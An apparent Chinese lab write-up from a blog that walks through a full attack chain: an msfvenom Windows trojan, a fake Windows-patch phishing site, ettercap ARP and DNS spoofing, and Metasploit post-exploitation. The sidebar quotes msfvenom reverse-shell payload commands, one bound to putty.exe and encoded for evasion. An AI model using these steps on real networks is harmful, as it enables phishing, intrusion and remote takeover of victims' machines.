【Msfvenom 木马制作配合ettercap实现攻击】

已于 2022-03-23 09:08:17 修改
阅读量4.4k 收藏 2
点赞数 4
分类专栏: 网络安全 安全工具使用 文章标签: linux 系统安全
于 2022-03-19 22:12:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/123599974
版权
本文详细介绍了如何利用Kali Linux制作Windows木马,通过Apache服务器上传,伪造Windows补丁网站,实施ARP攻击和DNS欺骗,最终通过Metasploit进行后渗透。展示了从工具配置到利用全过程的操作步骤。
摘要由CSDN通过智能技术生成

目录

一、工具

二、制作windows木马程序

三、将木马程序进行压缩后上传Redhat-8主机上。(注意:这儿我才用的是apache搭建的网站)

四、copy 一下Windows官方的漏洞补丁网站,作一下修改并加入木马程序作为我们伪造的windows补丁网站

五、 基于局域网的ARP攻击和DNS欺骗攻击手段的运用

六、主机访问任一网站-----上线

七、metasploit利用

八、演示结果如下

一、工具

Kali:192.168.43.103

Web服务器:192.168.43.193(Redhat-8)

局域网受害机:192.168.43.205(win10)

工具:kali自带的msfvenom 、Metasploit 以及局域网的常见攻击工具。

         Web服务器:apache。

二、制作windows木马程序

​​

三、将木马程序进行压缩后上传Redhat-8主机上。(注意:这儿我才用的是apache搭建的网站)

四、copy 一下Windows官方的漏洞补丁网站,作一下修改并加入木马程序作为我们伪造的windows补丁网站

效果如下:

当点击补丁连接时,则会跳转到指定的木马连接处,引导目标下载补丁。

至此假的钓鱼网站已经制作完成。

五、 基于局域网的ARP攻击和DNS欺骗攻击手段的运用

    目的是实现受害主机访问大多数的网站都被DNS定向解析到Redhat这个假的Windows补丁网站,使得受害机器下载对应的木马程序,而被迫上线。达到kali主机的后渗透利用的目的。

开启kali攻击机流量转发功能

 编辑/etc/ettercap/etter.dns文件。将伪造的IP地址的和域名映射起来。

开启dns欺骗。

六、主机访问任一网站-----上线

访问www.bilibili.com指定跳转到钓鱼页面上。

引导受害主机下载Windows补丁程序

七、metasploit利用

提权操作:创建用户。

八、演示结果如下

(方法可能太笨重了,在实际的攻防中时不可能有的,且还需其他的方法来解决被创建的用户被系统的管理员发现的问题。把这个当作一个小的实操还是可以的。)

网安第一深禽
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
WINDOWS系统下木马程序的设计与实现
DelPhi7292117的专栏
02-10 1081
WINDOWS系统下木马程序的设计与实现2010-1-10     作者:尘封 QQ:763934197    近年来,黑客攻击层出不穷,对网络安全构成了极大的威胁。木马是黑客的主要攻击手段之一,它通过渗透进入对方主机系统,从而实现对目标主机的远程操作,破坏力相当之大。    到目前为止,木马的发展已经历了五代:    第一代木马只是实现简单的密码窃取、发送等,在隐藏和通信方面
制作免杀windows木马(Winpayloads )
weixin_33717298的博客
07-11 1264
工具链接 https://github.com/nccgroup/Winpayloads 简介 Winpayloads 是一款制作免杀windows木马的工具 安装 下载git clone https://github.com/nccgroup/Winpayloads.gitcd Winpayloads 安装chmod +x setu...
渗透测试——漏洞扫描工具
最新发布
wuli1024的博客
11-20 626
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Ettercap的基本使用
qq_44418229的博客
04-06 1万+
1.Ettercap工具介绍 Ettercap是基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换的局域网络 借助Ettercap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输 2.Ettercap劫持用户信息攻击步骤 2.1.启动Ettercap 在kali的终端中输入 ettercap -G 点击右上角的勾号 2.2.扫描局域网内存活的主机 点击左上角的列表,host list ...
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
局域网攻击软件Ettercap中文说明.pdf
11-26
Ettercap中文说明 Ettercap是一个功能强大且灵活的局域网攻击软件,能够模拟和欺骗网络流量,实施中间人攻击(Man-in-the-Middle,...用户可以根据自己的需求选择合适的监听模式和参数来实现不同的攻击和嗅探任务。
ettercap实现dns欺骗过程
04-13
下面将详细阐述ettercap实现DNS欺骗过程中的步骤和涉及的知识点。 1. ** ettercap工具介绍**:ettercap是一款开源的网络嗅探和欺骗工具,支持多种操作系统,包括Kali Linux和Windows等。它提供了丰富的功能,如...
ettercap实现dns欺骗报文1
04-13
DNS欺骗【上】----ettercap实现 https://blog.csdn.net/redwand/article/details/105481042
ettercap实现dns欺骗报文2
04-13
ettercap实现dns欺骗 https://blog.csdn.net/redwand/article/details/105481042
ensp加kali实现arp欺骗攻击
04-21
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
中间人攻击——ettercap的使用
m0_57069925的博客
06-09 2567
前言:改文章仅可用于学习,不可以用于真实环境。一.背景 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段。在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游
Ettercap劫持辅助Metasploit进行浏览器攻击
cncold1的博客
08-05 1027
00x01 如果在同局域网下你想尝试攻破对方机器但是他并没有开放你可利用的端口进行攻击 但是你惊讶的发现,你在Http劫持的时候看到一个可疑的邮箱与密码,这样你便拿下了他的账户 但是你想深入到他的计算机中留下你想要的痕迹来显示你惊人的技术 But,你没有任何方式,只能眼睁睁的看着他逃脱你得魔爪,可是你甘心么? 00x02 攻击器前的准备 1#Kali系统一台 2#被攻击者邮箱##0...
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
图片木马制作的三种方法
热门推荐
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
kali下生成木马的工具
Ping_Pig的博客
09-16 7361
这里简单介绍kali下的两款工具,时间比较仓促,简单的说下,后面再继续更新一些详细内容 一款小巧的php后门工具:WeBaCoo 全名:Web Backdoor Cookie 简介:kali已经集成,产生终端性shell,编码类型通过http头传输,隐蔽性比较强 优缺点:方便简单,适合作为临时shell,没有密码,只能用于php 使用方法: 生成服务端程序 webacoo -g ...
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1064
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
制作windows和linux客户端恶意软件进行渗透
m0_47510703的博客
01-23 3525
一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序 msfvenommsfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
kali-TheFatRat木马生成工具安装及简单使用
qq_35258210的博客
02-10 1万+
kali终端下载 命令:git clone https://github.com/Screetsec/TheFatRat.git 推荐使用浏览器github上下载,比命令下载要快 浏览器下载:https://github.com/Screetsec/TheFatRat.git 下载完后将压缩包放到kali系统里 使用终端解压文件 命令:unzip 接下来要使用到的是这三个工具,我们想要使用先给它们添加可执行权限 命令:chmod +x setup.sh powerfull.s
icmp重定向攻击ettercap
09-13
针对 ICMP 重定向攻击Ettercap,我可以提供一些基本的信息。ICMP 重定向攻击是一种网络攻击攻击者通过发送伪造的 ICMP 重定向消息来欺骗目标主机修改其路由表,将流量重定向到攻击者指定的位置。Ettercap 是一个流行的网络嗅探工具,用于执行中间人攻击和其他网络攻击。 要防止 ICMP 重定向攻击,可以采取以下措施: 1. 网络分段和隔离:将网络划分为不同的子网,并使用防火墙来隔离不同的网络段。 2. 加强网络设备安全性:确保网络设备(如路由器和交换机)的操作系统和固件是最新的,并配置强密码和访问控制列表(ACL)。 3. 禁用 ICMP 重定向:在网络设备上禁用 ICMP 重定向功能,这样攻击者就无法使用该协议进行攻击。 4. 使用加密协议:使用加密协议(如IPSec)来保护通信,防止中间人攻击。 关于 Ettercap,我需要指出以下几点: 1. Ettercap 是一个开源的网络嗅探工具,可以用于执行中间人攻击、ARP 欺骗、密码拦截等。 2. Ettercap 的使用需要遵守法律和道德规范,未经授权使用 Ettercap 进行攻击是违法的。 3. 防御 Ettercap 攻击的方法包括使用网络入侵检测系统(IDS)、使用加密通信、定期更新操作系统和软件补丁等。 请注意,我并不鼓励或支持任何非法活动或网络攻击行为。上述信息仅供参考,希望能帮助您更好地了解相关问题。如有需要,请咨询专业人士或安全团队以获取更详细和准确的建议。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值